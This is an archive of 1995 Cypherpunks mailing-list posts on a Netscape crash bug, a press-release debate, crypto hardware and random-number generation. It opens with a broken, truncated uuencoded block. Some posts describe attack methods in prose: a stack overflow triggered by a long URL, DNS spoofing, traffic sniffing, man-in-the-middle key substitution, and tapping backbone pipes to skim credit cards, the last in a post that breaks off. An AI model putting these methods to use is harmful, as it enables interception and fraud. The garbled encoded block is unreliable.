M("!H879E('1H92!W:6QL(&]F(&-U2=S(&)O2!B96QI979E9"!T:&5Y#0H@("`@("`@("`@("`@("`@
M('=E2!H879E('1H92!D=71Y('1O('!R;W1E8W0@=&AE(%-O=F5R96EG
M;B!#:71I>F5N6]U+"!A2!T:&4 at 0V]NF5N
M&%S("!B96QI979E("!T:&4-"B`@("`@("`@("`@("`@("`@<')O=&5C=&EO
M;B!O9B!T:&ES(&-O=6YT2!A2!A;F0 at 5F5T97)A;G, at 0V]D92P@("XN+F5V97)Y("!A8FQE
M+6)O9&EE9"`@;6%L92`@*'1H:7,-"B`@("`@("`@("`@("`@("`@9&]E2`@;&%W+B`@5T4@(%1(10T*("`@
M("`@("`@("`@("`@("!014]03$5)#0H-"B`@("`@("`@("`@("`@("`@5T4@
M5$A%(%!%3U!,12!W:6QL(&YO(&QO;F=E2!A(&9O'!L:6-I="!I;G-T2!A;F0 at 5F5T97)A;G, at 0V]D92D@;W(@87,@;6%N>2!M;W)E(&%S#0H@("`@
M("`@("`@("`@("`@(&YE8V5S2P at 86QO;F<@=&AE('-O=71H97)N(%-O
M=F5R96EG;B!";W)D97(@;V8 at 0V%L:69O&EC;R!B
M;W)D97(L('=I=&@@65A2P@=&AE('-T871E(%)E<'5B;&EC
MF5N(&UI;&ET:6$@;65M8F5R2!I;B!O2P@:70@:7, at 8V%L;&5D($EL;&5G86P at 26UM:6=R871I
M;VXN("!)="!I2!O9B!E=F5R>2!S:6YG
M;&4@>65A2!O;B!E87)T:"P@=&AE(&]N92!T:&%T(&QA;F1E9"!A(&UA;B!O;B!T
M:&4-"B`@("`@("`@("`@("`@("!M;V]N("XN+B!T:&4@;VYE('1H870 at 8V%N
M('-E;F0@2!S=69F:6-I
M96YT;'D-"B`@("`@("`@("`@("`@("!A9'9A;F-E9"!T;R!D96-I9&4@:68@
M2!A;FYI:&EL871I;F<@=VAO;&4 at 8VET:65S
M(&%N9`T*("`@("`@("`@("`@("`@(&-O=6YT2!B>2!W
M:&EL92!T:&]S92!T:&%T('=O=6QD(&1E2!M96%N6]U("T-"B`@("`@("`@("`@("`@("`B3W!E
M2!S:'5T('1H92!S;W5T:&5R;@T*("`@("`@("`@("`@("`@("`@("!S
M;W9EF5D($UI;&ET:6$@*&%S(&1E9FEN960@
M8GD@;&%W("T at 06UE;F1M96YT#0H@("`@("`@("`@("`@("`@("`@(#(@;V8@
M=&AE(%53($-O;G-T:71U=&EO;BP at 5$E43$4@,2`P(%530R!396-T:6]N(#,Q
M(#$L(&%N9"!T:&4 at 0V%L:69O2!A;F0 at 5F5T97)A;G, at 0V]D92!396-T:6]N2!I;G1O('1H97-E(%5N:71E9"!3=&%T97,N#0H-"B`@("`@("`@("`@("`@
M("!4:&4 at 4')E2!S=&%T960@:&4@=VEL;"`G
M87!P2!L:79E2`@,38P,"`@;6EL97,@(&QO;F2!S;6%L;"!P97)C96YT86=E(&]F('1H870@
M;6EL86=E(&ES(&9E;F-E9"X-"@T*("`@("`@("`@("`@("`@(%=H96YE=F5R
M('1H92!L:6UI=&5D($)O6]U
M(&QO;VL at 8VQO2D-"B`@("`@("`@("`@("`@("!T:&5Y(&1O(&MN;W6]U('1O9&%Y(&ES('1H92!E
M>&%C=`T*("`@("`@("`@("`@("`@(')E<&]R="!P65R+"!T:&%T(&%L;"!P871R:6]T:6,-"B`@("`@("`@
M("`@("`@("!!;65R:6-A;G,L(&)E('1H97D at 8G5S:6YE2!C;&5R:W,L#0H@("`@("`@
M("`@("`@("`@;65D:6-S+"!C;V]K2!U<&]N('1H:7, at 9W)E
M870-"B`@("`@("`@("`@("`@("`@("!C;W5N=')Y+B`@2&4@(&)L97-S960@
M(&ET("!B96-A=7-E("!T:&4@('!E;W!L92`@=V5R92`@9&5C96YT("!A;F0@
M(&AO;F5S="P-"B`@("`@("`@("`@("`@("`@("!H87)D=V]R:VEN9RP at 86YD
M($=O9"!F96%R:6YG+B`@5VAE;B!T:&4 at 8VAI<',@=V5R92!D;W=N+"!T:&5Y
M('=E2!O6]U(&AE&5S("AS<&5N="!O;B`G9G)I=F]L;W5S)PT*("`@("`@("`@
M("`@("`@("`@(&UA='1E6]U(&AA=F4 at 8F5E;BP@=&AE
M('-A;64@<&5O<&QE('=H;R!H879E(&)E96X@2!T:&]S92!I;B!T:&4@=V]R;&0@
M=&AA="!A2P@:G5S
M="!A2`@:70@('-H;W5L9"`@8F4@(&1O;F4-"B`@("`@
M("`@("`@("`@("`@("!,05=&54Q,62X@(%=E("!C86X@(&%L;"`@86=R964@
M('1H870@('1H;W-E("!W:&\@("!W;W5L9"`@(&)R:6YG("`@9&5A=&@@("!A
M;F0-"B`@("`@("`@("`@("`@("`@("!D97-T6]U(&QI=F4@:6X@=&AE(&QI9VAT(&]F(&QI8F5R='D@=&AA="`@8V]M
M97,-"B`@("`@("`@("`@("`@("`@("!F2!A;F0 at 5F5T97)A;G, at 0V]D92!396-T:6]NF5N2!U<&]N('1H96ER(&]W;B!A<'!L:6-A=&EO;B!B
M92!E;FQI&5M<'1I;VYS(&%S(&YO=R!E>&ES="!O2!F:79E("!M;VYT
M:',N("!)9B`@8W5R("!G;W9E65A6]U(&$@=F5R>2!S:6UP;&EF:65D(&5X<&QA;F%T:6]N6UE;G0G+B`@270@;65A;G,@=&AA
M="!E86-H#0H@("`@("`@("`@("`@("`@:6YD:79I9'5A;"!M:6QI=&EA(&UE
M;6)E2!A;F0@2!B92!R97%U:7)E9"!B>2!T:&4 at 0V]M;6%N9&5R(&EN
M($-H:65F(&]F#0H@("`@("`@("`@("`@("`@=&AE(%53+"!T:&4 at 1V]V97)N
M;W)S(&]F('1H92!S=&%T92!297!U8FQI8R!O9B!#86QI9F]R;FEA(&%N9"!A
M;&P@;W1H97(-"B`@("`@("`@("`@("`@("!S=&%T92!R97!U8FQI8W,L('1H
M92!#;W5N='D at 4VAE2!B92!P2!A;F0@;6]N:71O
M2!R86YG90T*("`@("`@("`@("`@("`@(&]F('1H92!B;W)D97(N#0H-
M"B`@("`@("`@("`@("`@("!-;VYI=&]R:6YG(&]F('1H97-E(&9I96QD2X@($%L;"!S=7-P96-T960@:6QL96=A
M;"!A8W1I=FET>2!W:6QL(&)E(')E<&]R=&5D(&1I2!W:6QL('1A
M:V4@=&AE(&QE9V%L(&%C=&EO;G,@7-I8V%L#0H@("`@("`@("`@("`@
M("`@8F]R9&5R+B`@06YY(&]T:&5R(&%P<')E:&5N2!A<'!R;W!R:6%T92!L87<-"B`@("`@("`@("`@("`@
M("!E;F9O2!U;F1EF5N7,@2P@:70-"B`@("`@("`@("`@("`@("!B96-A;64 at 8VQE87(@=&AA
M="!T:&5R92!A6]N9"!Y;W5R('=I;&1E
Message-ID: <199509301557.LAA03540@clark.net>


> 
> Forwarded message:
> From owner-bugtraq at crimelab.com  Thu Sep 28 19:58:59 1995
> Approved-By: CHASIN at CRIMELAB.COM
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Approved-By:  Neil Woods 
> Message-ID:  <199509280324.EAA19959 at legless.demon.co.uk>
> Date:         Thu, 28 Sep 1995 04:24:06 +0100
> Reply-To: Bugtraq List 
> Sender: Bugtraq List 
> From: Neil Woods 
> Subject:      Re: Ray Cromwell: Another Netscape Bug (and possible security
> X-To:         BUGTRAQ at CRIMELAB.COM
> X-cc:         8lgm at bagpuss.demon.co.uk
> To: Multiple recipients of list BUGTRAQ 
> In-Reply-To:  <199509260045.OAA12377 at hookomo.aloha.net> from "Timothy Newsham"
>               at Sep 25, 95 02:45:26 pm
> 
> >
> > > >On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> > > >fault and subsequent coredump. GDB reports nothing useable (stripped
> > > >executable)
> > >
> > >   I cannot reproduce this bug on the following platforms:
> > >
> > >         Solaris 2.5 beta/Netscape 1.1N
> >
> > I've reproduced it fine under sol2.4 1.1N.  The page
> > I tested from is http://www.aloha.net/~newsham/test.html.
> > Simply click on the long test url and core dump.
> > (You can view source before clicking to see what you
> > are clicking on if you dont trust me :)
> >
> > > Howard Owen hbo at octel.com   Octel Communications Corporation  1024/DC671C31 =
> >
> 
> Ive tried this url, it does indeed core dump.
> 
> Just had a quick look at the core.  From first impressions, it's a global
> overwrite.  Therefore we're not overwriting a flushed stack frame, so a
> syslog(3) style exploit is impossible.
> 
> Global overwrites can be exploited, but due to the scenario we're looking
> at, I'd consider exploit chances to be very low indeed.

   Its not a global overwrite on my system. It is very definately a stack
frame overwrite. Ive already put code ony my stack using a URL
so I know its a stack problem.





From sandfort at crl.com  Sat Sep 30 08:59:48 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Sat, 30 Sep 95 08:59:48 PDT
Subject: Cypherpunks Press release
In-Reply-To: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
Message-ID: 


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 30 Sep 1995, Jiri Baum wrote:

> It seems to me that there are two viewpoints, 
>   * a spokesman would be useful, and
>   * a spokesman cannot be appointed due to lack of org
> 
> Which both seem to be true to me . . .

Well, neither seems true to me.  I don't see how, in the first
analysis, a spokesman would be useful to ME.  I am a Cypherpunk
by virtue of being on the mailing list, but I doubt most, and
certainly not all, list members would agree with everything I 
believe about privacy, encryption, freedom and the government.
I know I don't believe in a lot of the stuff I read here.  Why
would any of us want a spokesman other than themselves?  So I
ask, "useful" to whom?

Second, the reason a spokesman cannot be appointed is not due
to lack of [an?] organization, but rather the lack of any
unifying creedo or statement of belief.  Had the list founders
said, "Cypherpunks is a list for people who believe X, Y and
Z.  Sign-up if you are one of us."  Then we might have an
"official" viewpoint which a spokesperson could help
articulate.  They didn't, we don't and, frankly, that's the
way I like it.

You want to express your views to the press?  Knock yourself
out.  You want to call yourself a "Cypherpunk"?  No one will
stop you.  You want to characterize what other Cypherpunks
say and believe?  You might say something I disagree with,
but again, no one will stop you.  (Of course, they may counter
your free speech with some free speech of their own, but that's
the name of the game.)

Yours in anarchy,


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From rfb at lehman.com  Sat Sep 30 09:00:15 1995
From: rfb at lehman.com (Rick Busdiecker)
Date: Sat, 30 Sep 95 09:00:15 PDT
Subject: Electronic junk mail
In-Reply-To: 
Message-ID: <9509301557.AA23377@cfdevx1.lehman.com>


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Fri, 29 Sep 1995 16:54:43 -0700 (PDT)
    From: Syed Yusuf 

    I just recieved an electronic junkmail!

    . . .

    Cypher punks to the rescue? my privacy has been violated anyone got any
    ideas besides just putting each individual into my kill file?

Well, it's not a perfect solution and it might not have done anything
in this particular case, however the amount of electronic junk mail
has dropped close to zero osince I added ``Please do not send
electronic junk mail!'' to my signature.

			Rick 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG1o25NR+/jb2ZlNAQE5RwP/fPlJnpSCqV7YoA2vi8DAwW6m7bzNwmG7
ZH5mciCIvlrdL1Ua0ERVsiqmcXDE5lvU7aYigexBzedUX+q8E67St87gKEuXLkNa
tGNdOlDHb+JwUVfyUWXrHTHVkCgK//MIdToEypkLLv5stG0mHwwh2lf/SZgEPisk
YZJs/btH/TU=
=FO6+
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb at lehman.com or rfb at cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.





From jamesd at echeque.com  Sat Sep 30 10:05:25 1995
From: jamesd at echeque.com (James A. Donald)
Date: Sat, 30 Sep 95 10:05:25 PDT
Subject: Cypherpunks Press release
Message-ID: <199509301705.KAA24620@blob.best.net>


At 05:26 PM 9/30/95 +1000, Jiri Baum wrote:
>All that is needed then is someone with a fax machine to volunteer
>to receive the fax, type it in and summarise the response afterwards
>(noting points on which there was disagreement, and who disagreed
>in what way).

Let the dim bulbs subscribe to the list themselves.

If they are not capable of that, they will not make any
intelligent reports on it anyway.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From cman at communities.com  Sat Sep 30 10:43:08 1995
From: cman at communities.com (Douglas Barnes)
Date: Sat, 30 Sep 95 10:43:08 PDT
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: 



Simon--

There is a lot more to cryptography hardware than just making
stuff go fast. Any kind of co-processor array could handle the
job -- doesn't have to be DSPs. For unsigned integer math, the
486 DX4/100 is a perfectly decent chip, and prices are plumetting.
If all you want is to make RSA go fast, you can rack up as
many of these as you want, and do your work at Ethernet speeds
(which should be more than fast enough for the forseeable future.)
Also, you get to use your old familiar (and inexpensive) programming
tools to write your code.

It also turns out that when you're actually using cryptography to do
valuable stuff, a lot of other concerns are just as
important as speed -- in particular, physical security over the
private keys. Most server-oriented cryptography add-ins are highly
tamper-resistant units that can only be re-keyed when some sort
of dongle is attached. Said dongle can be kept much more securely
than a whole computer. Although other threats still remain, this
substantially reduces the threat of key compromise. Incidentally,
good hardware of this sort uses ASICs that give substantially more
bang for the buck than the DSP solutions you're suggesting.

Certainly messing around with DSPs is fun -- I've done it and
enjoyed it -- but I don't think they will ever be significant as
cryptographic co-processors.

>That's another question. A DSP chip can also be used for crypto - yet
>sound cards and nexts aren't ITARed, and aren't really considered
>dual-use. A Modular exponentiator isn't a crypto device  (hey -
>it's a bignum accelerator for Mathematica). Now, if I had a pipelined
>WSI chip capable of delivering one result per cycle, I could think of
>some useful applications, but ...
>
>Simon







From zinc at zifi.genetics.utah.edu  Sat Sep 30 10:46:10 1995
From: zinc at zifi.genetics.utah.edu (zinc)
Date: Sat, 30 Sep 95 10:46:10 PDT
Subject: Simple Hardware RNG Idea
In-Reply-To: 
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----

howdy cpunks,

regarding the use of radioactive material for generating random
numbers, lantern mantles are fairly radioactive.  i'd say they would
be able to emit sufficient particles for OTP use, especially if one
builds a device that just constructs the pads all the time (ie, it
just sits there making various pads of X min length and Y max length,
storing them on a hard drive, or RAM if you're that rich).  you just
request a pad from the machine when you need it and encrypt whatever
with it... 

- -pjf
 
patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp at zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG2E5E3Qo/lG0AH5AQHBngQAieD6OL+sVGbyqHAuTFlLL7i1gFOQ5TA3
dGOAACMqWZGfHYIKkSZxaNIm1NjvSqjFK/0w/tZCtZedJBtPtxnCXSGRgF8FW8RG
QfxR2V9fnpNRje/w7+uh/1JezN/KGv3kWJ7DR8yyEIKcJK/MyGhdCfHNLjgHRGv4
yuezjkFnD5w=
=R7+/
-----END PGP SIGNATURE-----





From sameer at c2.org  Sat Sep 30 12:01:28 1995
From: sameer at c2.org (sameer)
Date: Sat, 30 Sep 95 12:01:28 PDT
Subject: Cypherpunks Press release
In-Reply-To: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
Message-ID: <199509301855.LAA20507@infinity.c2.org>


> 
> Except PGP skill doesn't equal PR skill, not to mention that there
> might be a geographical, time-zone or language barrier.
> 
> Sometimes having a separate PR person is useful, even if it does
> tend to lead to the moronic statements salesdroids are infamous for.
> With care, this problem can be minimized.

	In which case the person in question can hire their own PR
person. If Community ConneXion had the resources, we would hire a PR
person, because I would rather spend my time writing code and
implementing anonymous systems than writing press releases and talking
to reporters.

> 
> Only problem is, does anyone know of any other way to get our
> ideas to be accepted by Joe Sixpack?

	I don't expect The Mythical Joe Sixpack to accept my views.

> What is the essential difference between a jounalist writing an
> article and a volunteer writing a press release?

	The difference between "speaking for" and "speaking about"

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org




From jbass at dmsd.com  Sat Sep 30 12:09:27 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:09:27 PDT
Subject: A new tack on breaking SSL streams and NetScape servers
Message-ID: <9509301909.AA10965@dmsd.com>


| From jbass Mon Sep 25 15:00:41 1995
| To: JohnCGreen at aol.com
| Subject: Re:  Netscape bug, RSA patent, hacker challenge
| Cc: rmiug-discuss at rmiug.org, isig at netf.org
| 
| On Thu, 21 Sep 1995 JohnCGreen at aol.com wrote:
| > Internet commerce is getting off to a slow start. One of the reasons is
| > nervousness on the part of the general public regarding the use of insecure
| > networks. I believe it is not in the industry's interest to have vendors
| > publicly pointing out flaws in competitors' products.
| [ ... part deleted ...]
| > I believe that as long as industry experts working for huge companies like
| > Sun and AT&T as well as executives of small companies like NetManage and
| > Community ConneXion continue to criticize publicly the security of
| > competitors' systems commerce will be very slow to develop.
| > - - -
| > Internet Marketing and Business Development Consultant
| > 21483 Old Mine Rd             Tel: (408)353-1870
| > Los Gatos CA 95030           Internet: JohnCGreen at aol.com
| 
| Most of us are employed directly or indirectly by somebody. The quotes
| involved were not derived from text under a press release letterhead
| by the employers of those involved.  The press is certainly free to use
| the persons educational and employment credentials in citing the source.
| Your objections here are with out merit, since the quotes were not
| officially released by the businesses involved and only serve to distract
| from the real problems.
| 
| Internet commerce is getting off to a slow start for good reason. Encryption
| or not, using the internet in it's current state for commerce is fundementally
| insecure, and the commercial internet providers have failed to address the
| primary problems. During a security discussion in the Colorado SuperNet
| users group mailing list last spring Brad Huntting, one of CSN's lead
| techinical specialists, made this remarkably clear in his posting on
| 13 Mar 1995 23:55:46 in response to my posting regarding minimal security
| expectations to do business on/over the internet.
| 
| A clear line of attack for any site dealing with credit cards or other
| valuable data would be to attack the authoritative name servers (and routes
| to/thru DNS servers) to reroute the target hosts traffic thru a filter host
| to skim off data transparently. Or more directly to watch /dev/nit somewhere
| on the network where www clients or servers are active with this data.
| 
| I am hardly an internet security expert, but also far from being a newbie
| at this game. I often have a more fundamental perspective on these problems,
| and in some cases very different levels of expectations. We are dealing with
| areas where there is no single right and wrong way to solve the security
| problem. But there are clearly certain technical flaws that MUST be addressed
| FIRST, before any solution will be viable.
| 
| [from my Mon, 13 Mar 95 21:43:46 -0700 posting to ug at csn.net]
| 
| I start with 4 expectations about providers which are seldom met:
| 
| 	1) ISP's manage internal and external back bones in a secure mode.
| 	   This means that nobody except critical internal staff can snoop
| 	   customer traffic or program routers - by network design.
| 
| 	2) ISP's manage the bridge/routers and subnets for network customers
| 	   (dedicated/slip/ppp) with advertised routes/domains/MX service
| 	   as secure too.
| 
| 	3) They firewall the billing systems, key servers, and monitor
| 	   the security for them very carefully.
| 
| 	4) They have a relatively insecure interactive environment on it's own
| 	   subnet behind a bridge/router/etherswitch to issolate it from the
| 	   internal backbone.
| 
| The CSN/Brad Huntting response was:
| 
| >I dont believe any ISP's do this. "As secure"?  This [...] is fantasy.
| 
| With this model we can make some assertions (not necessaryly true today):
| 
| 	A) Customer data between two full-time (#2 above) subscribers (of
| 	   atleast the same provider, and reasonably expected between major
| 	   providers) *SHOULD* be expected to be secure *AND* that they devote
| 	   the resources to insure that it remains secure. Without this
| 	   everyone using the internet to transact business is highly at risk.
| 
| 	B) Mail service between two full-time (#2 above) subscribers (of
| 	   atleast the same provider, and reasonably expected between major
| 	   providers) *SHOULD* be expected to be secure. This is clearly not
| 	   true today since some providers use interactive customer systems
| 	   for mail servers - so fall back delivery via MX records drop mail
| 	   into an insecure environment.
| 
| The CSN/Brad Huntting response was:
| 
| > E-Mail?  Secure?  You are high...
| 
| It's no wonder an increasing number of companies are all but disconnecting
| from the internet.
| 
| The interactive systems at providers sites are completely a different cow/pig
| ...  they are difficult to class as anything but unsecure/hostile since the
| user base has *NO* controls. Anybody that pays their startup fees can get an
| account and hack/crack for atleast a month. Running www, other clients or
| servers which transact business in this environment is fundementally insecure.
| Because of this, the home computer model over slip/ppp should be the only or
| prefered way to do internet business.
| 
| Any rational provider needs to firewall their "support" systems (routers,
| billing systems, and key servers) from this interactive zoo, slip/ppp/dedicated
| customers, and the rest of the internet. The Kevin Mitnick attack was pure
| stupidity ... he left a trail to his apartment. The providers involved didn't
| do enough to firewall their support systems. Dozens/hundreds of other hackers
| and crackers are atleast smart enough to loop their telnet/rlogins thru foreign
| sites that *WILL NOT* provide call/route trace data to the Feds and then loop
| the service such that packet correlation within a provider can not be done.
| Had Mitnick done this he would still be reaping havoc. Other probably are
| still at it, untraceable.
| 
| I have several friends that have been running mail order businesses via
| WEB servers ... you can order audio CD's, Video's, software, Adult toys,
| and other interesting things from them. They are also cracker targets since
| they do business via credit cards from their systems. Unless somebody can
| start making the core part of the network secure and drive the cracker
| havens from the net, I would not be suprised if the credit card companies
| start withdrawing authorization from these businesses. Some of the non-credit
| card companies, like Pizza Hut will also get tired of the internet when
| some SOB floods them with prank orders day in and day out ...
| 
| Current "secure protocols" are hardly secure in an insecure environment, they
| require atleast a certain trusted agent/transport domain to work.  If we are
| going to "cleanup the net", it is going to be with providers and users taking
| responsiblity for securing the primary backbones and provider resources, then
| removing the hostile users and havens from the net.
| 
| Having safe-havens on the net where hackers from around the world can safely
| telnet thru has to stop ... before business on the internet is practical.
| Getting the ISP's to accept basic route/data security as part of their service
| offering is manditory for any sucessful encryption scheme. NetScape's current
| problems are just the tip of the iceberg.
| 
| -----------
| John Bass
| UNIX Consultant                     Development, Porting, Performance by Design
| 
| 
| From jbass Mon Sep 25 16:48:29 1995
| To: isig at netf.org, rmiug-discuss at rmiug.org
| Subject: encryption in an insecure environment
| Status: O
| 
| Since several Public Key and PGP supporters don't understand the basics
| of their own offerings ... I'll provide the rebuttal publicly for the
| rest of you who may have been confused by my last posting.
| 
| Encryption security is only as good as the security of the "key(s)" involved.
| How keys are transmitted is the weak link for network based encryption
| security systems.
| 
| First Public Key encryption is far better than "pretty good" as long as
| you know the sending party *IS* using *YOUR* key. The problem is that
| when one or more messengers are in the loop, they can keep the receipents
| key and provide the sender with their own key. When they get the senders
| message they can decode the text, then re-encode it with the key obtained
| from the receipent before passing it along to the receipent.
| 
| Using Public Key encryption over the internet therefore requires that the
| messengers (ISP's and the commerical internet backbones) are trustworthy
| in delivering keys and limiting data access. If any point in the network
| allows a hacker to substitute keys and reencrypt messages, then communication
| between the customer and vendor is insecure. Routers, bridges, and Domain
| Name Servers become key targets and must be trusted and secure. This is not
| true today.
| 
| John Bass
| UNIX Consultant                     Development, Porting, Performance by Design
| 
| From jbass Tue Sep 26 20:46:01 1995
| To: rmiug-discuss at rmiug.org, isig at netf.org
| Subject: DNS role in an insecure network environment
| Status: O
| 
| Since some folks here may not understand why Domain Name Servers
| and the routes to/from them must be secure I'll provide a short
| description of why attacking them, or their routing, can be used
| to attack a vendors server system.
| 
| Domain Name Service (DNS) has several critical roles in regard
| to supporting internet security. This opens the door for several
| interesting attacks.
| 
| It is critical that the mapping of host.domain a client system results
| in the internet address of the server host requested - and not that of
| some substituted server intercepting traffic for it.
| 
| If an attacker can convince a client system to resolve requests for
| server.vendor.domain to the substituted server, then the attacker can
| forward the clients requests to the real server while skimming the
| data involved. There are several ways to do this ranging from directly
| attacking the DNS system to injecting subsituted DNS replys into the
| network. Doing this on an ISP's interactive system simply requires
| gaining enough privilege to either edit/replace host name tables or
| forcing an entry into the network kernel cache. Since DNS entries are
| cached, the substituted server address can have a fairly long life. The
| substituted server can be any machine in the world ... either in a safe
| haven zone or another compromised site to protect the hackers identity.
| 
| Authentication often requires that given some client/server address
| that you can trust DNS services to map it to the correct host.domain
| name which is then compared with an access control list.  Many network
| servers can be attacked by subsituting a trusted sites name given the
| attackers address.
| 
| The reliance on DNS creates a house of cards out of internet security,
| particulary since the ISP's internal network and internet backbone
| is managed without explict attention to data/routing/DNS security. The
| ISP's seem think it's the users problem ... without any viable solution.
| 
| John
| 
| From jbass Thu Sep 28 08:14:26 1995
| To: Steve Hultquist 
| Subject: Re: DNS role in an insecure network environment
| Cc: rmiug-discuss at rmiug.org, isig at netf.org
| Status: O
| 
| Steve,
| 
| Let's recap this in brief. In the first three postings I formed a strong
| argument that a collection of technologies in current use and percieved
| as secure, have in fact several lines of attack related to the messenger
| problem of distributing public keys. Nobody has offered a rebuttal to
| this method of attack showing the assertions invalid.
| 
| This assertion directly implies that current practice of using Public
| Key encryption with inband keys is flawed, independent of the merits
| of the encryption algorithm, key algorithm or key length.
| 
| Independent of the merits of any encryption or authentication algorithm,
| accepted solutions to the the messenger attack require the existance of
| either an out-of-band key or a secure communications channel. How secure
| the channel must be depends on several factors. At minimum it must have
| routing integrity, which is not currently the case, to prevent a third
| party from inserting a filter (messenger) into the data path. Preferably
| the data path would not be clear text at all.
| 
| There are millions of customers and a large number of vendors accepting
| the current technology without the knowledge of it's flaws.
| 
| You jump in with two postings which attempt to discredit my assertions
| purely with the force of your reputation saying it ain't so, and offer
| your signature lines as proof. And then get highly personal and offended
| when I question your weak attack.
| 
| There are solutions to the problem, but they are not in widespread use
| on the internet to protect WWW commerce. CrypoCards are neat, but they
| are not the solution for the WWW. Third party systems still have the
| messenger problem unless an out-of-band key exists or the communication
| channel is secure to start with.
| 
| My business cards just say "consultant" ... I also have a few left that
| say "janitor" (for cleaning up other engineers messes, and empting the
| trash after my employees). I also have a few that simply say "owner",
| but I have never thought it quite right to run my 1-10 man shop with
| the title president, CEO, or whatever titles that are used by those
| with the real resposibility for running multi-million/billion dollar
| companies with hundreds/thousangds of peoples jobs/lives at stake.
| 
| 
| You say:
| 
| 	I think the technology is well-understood and has to do with
| 	key escrow by trusted servers.
| 
| and I say fine, but that doesn't help today's customers. The messenger
| problem still exists with dynamic in-band registration, an out-of-band
| key is still needed..
| 	
| 	Yes, it takes a little time to set up third-party
| 	key servers, but it's not *that* difficult.  And, fortunately, it has
| 	nothing to do with major changes to things as fundamental as DNS.
| 
| and I say fine, but that doesn't help today's customers. Nor did I advocate
| changes to DNS ... just cleaning up the security of the channels it operates
| over.
| 	
| 	I don't think [out-of-band] key management is that difficult.
| 
| I don't think it is either, *IF* done by the ISP for the ISP's protection
| domain *AND* the ISP's implement and extended protection domain to cover
| the backbone and all ISP's. But's that's not here today either
| 	
| 	Are you familiar with the current IETF working groups?  Would you
| 	like to provide us with an assessment of the various approaches, including
| 	IPv6 (which, by the way, we are demonstrating here at Networld+Interop this
| 	week: http://www.interop.net)?
| 
| As I stated in my original post I don't claim to be an internet security expert.
| You do.
| 
| The real point is that none of this protects todays customers and vendors.
| I am not going to beat my chest and hope some group can change the risks
| for www customers in the next year either. (But it would be nice)
| 	
| 	>Since current systems depend on messengers, they are flawed from
| 	>a security standpoint no matter how many million may be in use.
| 	>The NetScape encryption that was just broken what widely in use
| 	>and success by your definition ... by mine it was a failure due
| 	>to it's flaws ... exploited or not.
| 	
| 	Hogwash.  Netscape was broken because they screwed up their randomization
| 	routine.  It has nothing to do with the inherent security of the design,
| 	other than the flawed randomization.  These are the rumors I was talking about.
| 
| (grin) then prove it. Disprove the messenger attack. This is not a complex
| theory or algorithm we are talking about. The thousand or so readers of
| these lists will sleep a lot better if you can.
| 	
| 	>And there in lies the cruz of the problem, trusting people with your title
| 	>for security who claim to be experts, yet just stick their head in the sand ...
| 	
| 	You know, John, you are one of the most caustic people I have ever conversed
| 	with.  You don't know me, other than our e-mail conversations, yet you
| 	continue to denigrate me in public.  I won't talk about my background,
| 	except to say that none of my security implementations have been
| 	compromised, my clients recommend me to others, and I am well aware of those
| 	times I need to enlist other experts.
| 	
| 	Unlike you, John, I'm not perfect, and can use the assistance of others at
| 	times.
| 
| Gee ... for somebody that doesn't know me either you bring a lot of personel
| stabs into this. "stick their head in the sand" is pretty meek compared to
| your full on attack.
| 	
| 	>please explain to the rest of how your CryptoCard can be used
| 	>to solve the problem for the rest of us that would like to wander
| 	>the Web and shop without physically registering our card
| 	>with each store.
| 	
| 	You'd only need to register it with a key server.  But, you won't be
| 	convinced, will you, John?
| 
| and serveral million readers installed on every PC, and several million more cards
| with unique ID's manufactured and distributed to users world wide, and the
| coding whould have to have a trap door for the NSA and law enforcement which
| would soon become widely known by all cyber crooks and econo terrorists.
| (or copies of the servers database should some employee decide that a new
| name and foreign home and retirement plan was worth the price of walking out
| the front door with some extra in their pocket) Not every problem has
| a technical solution ... not even for technical secrets.
| 	
| 	>dream on and sleep well ...
| 	
| 	I sleep well almost every night.  And so do my clients.
| 	
| 	It makes me wonder about yours.  If you have any.
| 	
| cheap shot ... sleep on. (but I wonder about your ...)
| 
| 	Cheers,
| 	ssh
| 	--
| 	Steve Hultquist                   Distributed Systems and Internet Engineering
| 	President, Worldwide Solutions, Inc.                         Boulder, Colorado
| 
| John Bass
| Janitor, DMS Design		;-))
| 
| From jbass Fri Sep 29 01:28:26 1995
| To: isig at netf.org, rmiug-discuss at rmiug.org
| Subject: How to get rich from this ...
| Status: R
| 
| 
| Security flaws for the most part are just fun toys. With WWW & credit cards
| we can really let our fingers to the walking. Thru the internet backbone
| travels thousands of credit cards with authorization data every day/hour/minute.
| Or you can be a little more selective and pick a state, city, or smaller
| geograhical area by choosing which pipe to plug into.
| 
